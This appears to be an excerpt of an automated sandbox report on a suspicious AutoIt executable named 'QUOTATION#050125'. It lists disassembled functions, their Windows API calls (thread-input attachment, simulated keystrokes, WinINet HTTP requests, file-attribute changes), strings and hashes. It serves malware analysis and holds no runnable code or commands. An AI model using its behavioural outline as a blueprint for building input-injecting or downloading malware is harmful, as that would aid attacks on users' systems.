ComboBox, xrefs: 004E1EEC
ListBox, xrefs: 004E1F21

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName
String ID: ComboBox$ListBox
API String ID: 2573188126-1403004172
Opcode ID: 43f840d50fe17893afc4e78fbfdd94047b9ba70ae8b50c6351a9c96797d6c77f
Instruction ID: f75bf15fc642298dbfbe4dfa088f4dc6f9adec14859eca3f890258ece3dddd9f
Opcode Fuzzy Hash: 43f840d50fe17893afc4e78fbfdd94047b9ba70ae8b50c6351a9c96797d6c77f
Instruction Fuzzy Hash: 8E21F270940214BFCF05AFA5CC84DFEBFB8EF15344B10450AF9616B2A1DB3A4908DBA4

Function 004E1FC0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 004E3CCA

SendMessageW.USER32(?,00000186,00020000,00000000), ref: 004E2043
GetDlgCtrlID.USER32 ref: 004E204E
GetParent.USER32 ref: 004E206A
SendMessageW.USER32(00000000,?,00000111,?), ref: 004E206D
GetDlgCtrlID.USER32(?), ref: 004E2076
GetParent.USER32(?), ref: 004E208A
SendMessageW.USER32(00000000,?,00000111,?), ref: 004E208D

Strings

ComboBox, xrefs: 004E1FCD
ListBox, xrefs: 004E2002

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName
String ID: ComboBox$ListBox
API String ID: 2573188126-1403004172
Opcode ID: 4f74469a4eed1ae0ace01b9096769d3da758708f371288068a58b94f9eb58cd5
Instruction ID: 207fa856e72d7f3da3804d63cf0b78089555305d573c8c2c06a21714e944a98a
Opcode Fuzzy Hash: 4f74469a4eed1ae0ace01b9096769d3da758708f371288068a58b94f9eb58cd5
Instruction Fuzzy Hash: 5D21D471940214BFCF11AFA5CC45EFEBFB8EF15344F104406BA51AB2A1DB7A8918DB64

Function 00503C30 Relevance: 15.3, APIs: 10, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00503C5C
CoInitialize.OLE32(00000000), ref: 00503C8A
CoUninitialize.OLE32 ref: 00503C94
GetRunningObjectTable.OLE32(00000000,?), ref: 00503DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00503ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00503F0E
CoGetObject.OLE32(?,00000000,0051FB98,?), ref: 00503F2D
SetErrorMode.KERNEL32(00000000), ref: 00503F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00503FC4
VariantClear.OLEAUT32(?), ref: 00503FD8

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: a24be818b85a2f2d7f56e1731d8fc2d09099d80bd8714b693623010d23aa30fd
Instruction ID: 59e6d2b42802f3927aee8af34106f6f2b8213571223df6fc9b4ed7d70ae5ce7e
Opcode Fuzzy Hash: a24be818b85a2f2d7f56e1731d8fc2d09099d80bd8714b693623010d23aa30fd
Instruction Fuzzy Hash: 18C131B1608201AFD700DF69C88492FBBE9FF89748F04491DF98A9B290D731EE45CB52

Function 00513A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00513A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00513AA0
GetWindowLongW.USER32(?,000000F0), ref: 00513AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00513AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00513B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00513BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00513BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00513BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00513BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00513C13

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 10d22294fecbdb4a8bd7121015818535ead3134c52292c616091c1d30e0163bd
Instruction ID: 35748a0d353e16e40c7e82d45f7cfae67e7a1a4f01b99951ba2f65f67446dba3
Opcode Fuzzy Hash: 10d22294fecbdb4a8bd7121015818535ead3134c52292c616091c1d30e0163bd
Instruction Fuzzy Hash: AA619D75900208AFEB10DFA8CC91EEE7BB8FF09304F104099FA15AB291D774AE85DB50

Function 004EB12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004EB151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,004EA1E1,?,00000001), ref: 004EB165
GetWindowThreadProcessId.USER32(00000000), ref: 004EB16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004EA1E1,?,00000001), ref: 004EB17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 004EB18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,004EA1E1,?,00000001), ref: 004EB1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004EA1E1,?,00000001), ref: 004EB1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,004EA1E1,?,00000001), ref: 004EB1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,004EA1E1,?,00000001), ref: 004EB212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,004EA1E1,?,00000001), ref: 004EB21D

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 3606469c5c2b4902f5fb7384526c863a2525e6c6a4e01bce1792aa472837d0bb
Instruction ID: eea28c0593249df1805a308c9c1a21b0072fa246d29bb2ca7a418f49c6daa86e
Opcode Fuzzy Hash: 3606469c5c2b4902f5fb7384526c863a2525e6c6a4e01bce1792aa472837d0bb
Instruction Fuzzy Hash: 0731C275540304BFDB109F65DC5CBAF7B69EF20393F108146FA04C62A0E7B8A9049FA8

Function 00481410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00481459
OleUninitialize.OLE32(?,00000000), ref: 004814F8
UnregisterHotKey.USER32(?), ref: 004816DD
DestroyWindow.USER32(?), ref: 004C24B9
FreeLibrary.KERNEL32(?), ref: 004C251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 004C254B

Strings

close all, xrefs: 00481454

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 0738ad937c9744c92c373df3f2dc701c027dd156e13684bd7439eeea77262711
Instruction ID: ecede8495bdd1fcfa69c249745c034408b4a1732f3d72ff70888fa01af830b7e
Opcode Fuzzy Hash: 0738ad937c9744c92c373df3f2dc701c027dd156e13684bd7439eeea77262711
Instruction Fuzzy Hash: BAD186347012129FCB18EF15C594E2AFBA4BF05704F1446AFE84AAB261CB79AC12CF59

Function 004F7DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004F7FAD
SetCurrentDirectoryW.KERNEL32(?), ref: 004F7FC1
GetFileAttributesW.KERNEL32(?), ref: 004F7FEB
SetFileAttributesW.KERNEL32(?,00000000), ref: 004F8005
SetCurrentDirectoryW.KERNEL32(?), ref: 004F8017
SetCurrentDirectoryW.KERNEL32(?), ref: 004F8060
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 004F80B0

Strings

*.*, xrefs: 004F8066

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 151f3e5634cd2ee2720a27f064a52b21693166fc58356fb3ae89c7c8a9618be8
Instruction ID: 096f7761708ce180b5ce84896a53e2e3135387a1426084b248b1edbd5d3d6d71
Opcode Fuzzy Hash: 151f3e5634cd2ee2720a27f064a52b21693166fc58356fb3ae89c7c8a9618be8
Instruction Fuzzy Hash: F081BC725082099BCB20EF15C8449BFB3E8AB99314F544C5FFA85CB250EB3DDD498B5A

Function 00485BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00485C7A

Part of subcall function 00485D0A: GetClientRect.USER32(?,?), ref: 00485D30
Part of subcall function 00485D0A: GetWindowRect.USER32(?,?), ref: 00485D71
Part of subcall function 00485D0A: ScreenToClient.USER32(?,?), ref: 00485D99

GetDC.USER32 ref: 004C46F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 004C4708
SelectObject.GDI32(00000000,00000000), ref: 004C4716
SelectObject.GDI32(00000000,00000000), ref: 004C472B
ReleaseDC.USER32(?,00000000), ref: 004C4733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 004C47C4

Strings

U, xrefs: 004C4693

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: c3f0c4da6417e495f379373e860e89b512e098b55c28db81e6ae69a69a08f8d7
Instruction ID: e20289d8b3702f43ab1e2b2e8a343e3b899fb68e6aaa12e84954ea89677481d2
Opcode Fuzzy Hash: c3f0c4da6417e495f379373e860e89b512e098b55c28db81e6ae69a69a08f8d7
Instruction Fuzzy Hash: ED71E038500205DFCF219F64CA94FEA3BB1FF8A324F14422EED555A26AC3398841DF64

Function 004F359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 004F35E4
LoadStringW.USER32(00552390,?,00000FFF,?), ref: 004F360A

Strings

"%s" (%d) : ==> %s:, xrefs: 004F3742
^ ERROR, xrefs: 004F36C9
Error: , xrefs: 004F36EF
Line %d (File "%s"):, xrefs: 004F366B
"%s" (%d) : ==> %s:%s%s, xrefs: 004F3724

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: LoadString
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2948472770-2391861430
Opcode ID: d6b216f16fc09a80bbe58728cce0e9ed932d9033327fec993b6cfd7f1dfb3050
Instruction ID: 710ecb812f17b83f97c5a0c060bcaa07b3e1e529eb6ba2079d6d75aff0a63bb0
Opcode Fuzzy Hash: d6b216f16fc09a80bbe58728cce0e9ed932d9033327fec993b6cfd7f1dfb3050
Instruction Fuzzy Hash: D351BF71800609BADF14FFA1CC42EFEBB74AF14709F04442AF605721A1EB391B99DB69

Function 004FC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004FC272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004FC29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004FC2CA
GetLastError.KERNEL32 ref: 004FC322
SetEvent.KERNEL32(?), ref: 004FC336
InternetCloseHandle.WININET(00000000), ref: 004FC341

Strings

, xrefs: 004FC2BB

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: e2650c69cbc040d7c021a86381f5ddd3f773b7bd5935864c05454ceb0898dea2
Instruction ID: 348d30e52ff7cb9979fa85c1e437a064384663962454be6ef6a8d2e48a4fa4cf
Opcode Fuzzy Hash: e2650c69cbc040d7c021a86381f5ddd3f773b7bd5935864c05454ceb0898dea2
Instruction Fuzzy Hash: D131D1B160020CAFD7219F658DC8ABB7BFCEB19384B00841FF94692240DB39DD089B65

Function 004E989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,004C3AAF,?,?,Bad directive syntax error,0051CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 004E98BC
LoadStringW.USER32(00000000,?,004C3AAF,?), ref: 004E98C3
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 004E9987

Strings

., xrefs: 004E996D
Line %d (File "%s"):, xrefs: 004E992D
Line %d:, xrefs: 004E9912
%s (%d) : ==> %s.: %s %s, xrefs: 004E98F1
Error: , xrefs: 004E9955

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: HandleLoadMessageModuleString
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 2734547477-4153970271
Opcode ID: a9cd584d52d8e817c96c795e810d985cc0be968c041a609c95a79ee4e9702aea
Instruction ID: ae4f6fd0734d01a55c939ecd0913a71e6d2a0b55292fc39b9a4bc6fd577ae894
Opcode Fuzzy Hash: a9cd584d52d8e817c96c795e810d985cc0be968c041a609c95a79ee4e9702aea
Instruction Fuzzy Hash: 7E21913184021AABCF15AF91CC06EEE7B35BF14709F04482AF515620A2EB799A28DB15

Function 004E209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 004E20AB
GetClassNameW.USER32(00000000,?,00000100), ref: 004E20C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 004E214D

Strings

list, xrefs: 004E212F
SHELLDLL_DefView, xrefs: 004E20CC
smallicons, xrefs: 004E2115
details, xrefs: 004E20FB
largeicons, xrefs: 004E20E1

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 2c30f95997afde6d52ada42ab1ed9c2be4f7e096860506f6acb00493d1c52c2f
Instruction ID: 704cd2de0bcf325317e3f9b7b9db45f67f245aafece7c92bcd86d3c2533173d9
Opcode Fuzzy Hash: 2c30f95997afde6d52ada42ab1ed9c2be4f7e096860506f6acb00493d1c52c2f
Instruction Fuzzy Hash: 05115C766C4707BAF6016722DC07DEB7B9CDB15329B20001BF705A90E2FEF95902551C

Function 005150D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00515186
ShowWindow.USER32(?,00000000), ref: 005151C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 005151CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 005151D1

Part of subcall function 00516FBA: DeleteObject.GDI32(00000000), ref: 00516FE6

GetWindowLongW.USER32(?,000000F0), ref: 0051520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0051521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0051524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00515287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00515296

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 973e189b98a32d646ce54201170cf31db7874bdf6b5fd88a60d6b925fc4c5d57
Instruction ID: dd886a63c2016006615f259fa5e54db4f9cc1aa9f086ad888a0c77ec56645413
Opcode Fuzzy Hash: 973e189b98a32d646ce54201170cf31db7874bdf6b5fd88a60d6b925fc4c5d57
Instruction Fuzzy Hash: 9651E335A90A08FEFF219F64CC49BD83F61FB85321F148016F665962E0E7B5A9C4DB40

Function 00498B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 004D6890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 004D68A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 004D68B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 004D68D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 004D68F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00498874,00000000,00000000,00000000,000000FF,00000000), ref: 004D6901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 004D691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00498874,00000000,00000000,00000000,000000FF,00000000), ref: 004D692D

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 193f0a1ebdf00717abb0b0f761f4c0b137d7e9d4171f867bef444be360224f49
Instruction ID: c0c810d26f12269c89192e42b484df0bfac9e7d3a488f004d2fe2a46cb1da627
Opcode Fuzzy Hash: 193f0a1ebdf00717abb0b0f761f4c0b137d7e9d4171f867bef444be360224f49
Instruction Fuzzy Hash: B2518C70600205AFDF20CF29CC65BAA7BB6FB54354F14452EF902972A0DB79E951EB48

Function 004FC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004FC182
GetLastError.KERNEL32 ref: 004FC195
SetEvent.KERNEL32(?), ref: 004FC1A9

Part of subcall function 004FC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004FC272
Part of subcall function 004FC253: GetLastError.KERNEL32 ref: 004FC322
Part of subcall function 004FC253: SetEvent.KERNEL32(?), ref: 004FC336
Part of subcall function 004FC253: InternetCloseHandle.WININET(00000000), ref: 004FC341

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 01d3c3bcabf6ea8fcb7f137ca96f45d282c9afd8397ba5af36169277d242cadd
Instruction ID: 072367bd23764aad6dcbf695b66998848b702343c10559f66d1760c1b0fccd7d
Opcode Fuzzy Hash: 01d3c3bcabf6ea8fcb7f137ca96f45d282c9afd8397ba5af36169277d242cadd
Instruction Fuzzy Hash: 0E31A07554060DAFDB219FA5DE84AB7BBF8FF28300B04841EFA5682611C735E814EFA4

Function 004E25A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 004E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 004E3A57
Part of subcall function 004E3A3D: GetCurrentThreadId.KERNEL32 ref: 004E3A5E
Part of subcall function 004E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004E25B3), ref: 004E3A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 004E25BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004E25DB
